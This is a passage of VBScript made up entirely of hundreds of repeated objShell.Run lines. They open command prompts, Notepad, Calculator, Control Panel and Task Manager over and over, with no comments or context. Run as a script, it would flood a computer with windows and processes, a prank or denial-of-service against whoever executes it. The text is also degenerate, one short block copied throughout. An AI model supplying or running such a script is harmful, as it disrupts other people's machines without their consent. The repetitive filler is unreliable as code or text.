objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
